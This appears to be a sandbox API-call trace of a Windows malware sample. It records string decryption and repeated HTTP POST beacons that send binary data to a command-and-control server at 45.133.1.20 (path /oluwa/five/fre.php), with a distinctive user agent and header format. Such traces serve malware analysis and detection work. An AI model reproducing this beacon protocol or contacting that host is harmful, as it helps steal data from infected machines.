[0261.196] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.197] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0261.197] GetProcessHeap () returned 0x6a0000 [0261.197] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.198] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.198] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0261.199] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.200] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0261.201] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.201] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0261.207] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.208] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0261.208] GetProcessHeap () returned 0x6a0000 [0261.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0261.208] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0261.208] GetProcessHeap () returned 0x6a0000 [0261.208] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0261.208] socket (af=2, type=1, protocol=6) returned 0x8ec [0261.208] connect (s=0x8ec, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0261.233] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0261.233] GetProcessHeap () returned 0x6a0000 [0261.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0261.233] GetProcessHeap () returned 0x6a0000 [0261.233] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0261.234] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.235] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0261.235] GetProcessHeap () returned 0x6a0000 [0261.235] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b9c30 [0261.235] GetProcessHeap () returned 0x6a0000 [0261.235] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0261.236] GetProcessHeap () returned 0x6a0000 [0261.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0261.236] GetProcessHeap () returned 0x6a0000 [0261.236] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dcf38 [0261.236] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.237] wvsprintfA (in: param_1=0x6dcf38, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0261.237] GetProcessHeap () returned 0x6a0000 [0261.237] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0261.237] GetProcessHeap () returned 0x6a0000 [0261.238] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0261.238] send (s=0x8ec, buf=0x6bd460*, len=242, flags=0) returned 242 [0261.239] send (s=0x8ec, buf=0x6bb998*, len=159, flags=0) returned 159 [0261.240] GetProcessHeap () returned 0x6a0000 [0261.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0261.240] recv (in: s=0x8ec, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0261.324] GetProcessHeap () returned 0x6a0000 [0261.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0261.326] GetProcessHeap () returned 0x6a0000 [0261.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0261.326] GetProcessHeap () returned 0x6a0000 [0261.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9c30 | out: hHeap=0x6a0000) returned 1 [0261.326] GetProcessHeap () returned 0x6a0000 [0261.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0261.327] closesocket (s=0x8ec) returned 0 [0261.328] GetProcessHeap () returned 0x6a0000 [0261.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0261.328] GetProcessHeap () returned 0x6a0000 [0261.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.329] GetProcessHeap () returned 0x6a0000 [0261.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0261.329] GetProcessHeap () returned 0x6a0000 [0261.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0261.330] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1630) returned 0x8ec [0261.332] Sleep (dwMilliseconds=0xea60) [0261.333] GetProcessHeap () returned 0x6a0000 [0261.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0261.334] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.335] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.341] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0261.350] GetProcessHeap () returned 0x6a0000 [0261.350] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dcac0 [0261.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.351] CryptImportKey (in: hProv=0x6bef48, pbData=0x6dcac0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0261.353] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.353] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.354] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.355] GetProcessHeap () returned 0x6a0000 [0261.355] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcac0 | out: hHeap=0x6a0000) returned 1 [0261.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.357] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0261.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.358] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0261.359] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.363] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0261.363] GetProcessHeap () returned 0x6a0000 [0261.363] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.365] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.366] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.368] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.368] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.369] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.369] GetProcessHeap () returned 0x6a0000 [0261.369] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0261.369] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0261.369] GetProcessHeap () returned 0x6a0000 [0261.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0261.370] GetProcessHeap () returned 0x6a0000 [0261.370] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.370] GetProcessHeap () returned 0x6a0000 [0261.371] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0261.371] GetProcessHeap () returned 0x6a0000 [0261.371] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0261.372] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.372] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.381] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0261.389] GetProcessHeap () returned 0x6a0000 [0261.389] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0261.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.390] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0261.391] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.391] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.392] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.393] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.393] GetProcessHeap () returned 0x6a0000 [0261.393] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0261.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.395] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0261.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.396] CryptDestroyKey (hKey=0x6ad020) returned 1 [0261.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.399] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0261.399] GetProcessHeap () returned 0x6a0000 [0261.399] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.400] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0261.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.401] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0261.401] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.402] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0261.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.402] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0261.402] GetProcessHeap () returned 0x6a0000 [0261.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0261.403] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0261.403] GetProcessHeap () returned 0x6a0000 [0261.403] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0261.403] socket (af=2, type=1, protocol=6) returned 0x8f0 [0261.403] connect (s=0x8f0, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0261.432] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0261.432] GetProcessHeap () returned 0x6a0000 [0261.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf0e0 [0261.432] GetProcessHeap () returned 0x6a0000 [0261.432] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dcf38 [0261.433] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.434] wvsprintfA (in: param_1=0x6dcf38, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0261.434] GetProcessHeap () returned 0x6a0000 [0261.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba2f0 [0261.434] GetProcessHeap () returned 0x6a0000 [0261.434] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dcf38 | out: hHeap=0x6a0000) returned 1 [0261.434] GetProcessHeap () returned 0x6a0000 [0261.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0261.434] GetProcessHeap () returned 0x6a0000 [0261.434] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6d9718 [0261.435] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0261.436] wvsprintfA (in: param_1=0x6d9718, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0261.436] GetProcessHeap () returned 0x6a0000 [0261.436] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0261.436] GetProcessHeap () returned 0x6a0000 [0261.437] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d9718 | out: hHeap=0x6a0000) returned 1 [0261.437] send (s=0x8f0, buf=0x6bd460*, len=242, flags=0) returned 242 [0261.437] send (s=0x8f0, buf=0x6bb998*, len=159, flags=0) returned 159 [0261.438] GetProcessHeap () returned 0x6a0000 [0261.438] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9718 [0261.438] recv (in: s=0x8f0, buf=0x6d9718, len=4048, flags=0 | out: buf=0x6d9718*) returned 204 [0261.548] GetProcessHeap () returned 0x6a0000 [0261.555] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0261.555] GetProcessHeap () returned 0x6a0000 [0261.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0261.556] GetProcessHeap () returned 0x6a0000 [0261.556] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba2f0 | out: hHeap=0x6a0000) returned 1 [0261.557] GetProcessHeap () returned 0x6a0000 [0261.557] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf0e0 | out: hHeap=0x6a0000) returned 1 [0261.557] closesocket (s=0x8f0) returned 0 [0261.559] GetProcessHeap () returned 0x6a0000 [0261.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0261.559] GetProcessHeap () returned 0x6a0000 [0261.559] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.559] GetProcessHeap () returned 0x6a0000 [0261.560] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0261.560] GetProcessHeap () returned 0x6a0000 [0261.562] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0261.562] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9718, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1638) returned 0x8f0 [0261.564] Sleep (dwMilliseconds=0xea60) [0261.568] GetProcessHeap () returned 0x6a0000 [0261.568] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0261.569] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.569] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.577] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.578] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0261.585] GetProcessHeap () returned 0x6a0000 [0261.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0261.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.586] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0261.587] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.588] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.609] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.609] GetProcessHeap () returned 0x6a0000 [0261.610] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0261.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.611] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0261.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.612] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0261.613] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.613] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0261.613] GetProcessHeap () returned 0x6a0000 [0261.613] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.614] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0261.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.615] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0261.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.616] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0261.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.616] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0261.616] GetProcessHeap () returned 0x6a0000 [0261.617] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0261.617] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0261.617] GetProcessHeap () returned 0x6a0000 [0261.617] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0261.617] GetProcessHeap () returned 0x6a0000 [0261.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0261.618] GetProcessHeap () returned 0x6a0000 [0261.618] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0261.618] GetProcessHeap () returned 0x6a0000 [0261.618] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0261.620] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.620] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0261.625] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.626] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0261.632] GetProcessHeap () returned 0x6a0000 [0261.632] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0261.633] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.633] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0261.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.634] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0261.635] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.635] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0261.635] GetProcessHeap () returned 0x6a0000 [0261.636] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0261.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.637] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0261.638] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.639] CryptDestroyKey (hKey=0x6ad020) returned 1 [0261.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0261.640] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0261.640] GetProcessHeap () returned 0x6a0000 [0261.640] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0261.641] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.642] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0261.642] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.643] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0261.643] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.644] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0261.644] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0261.645] StrStrA 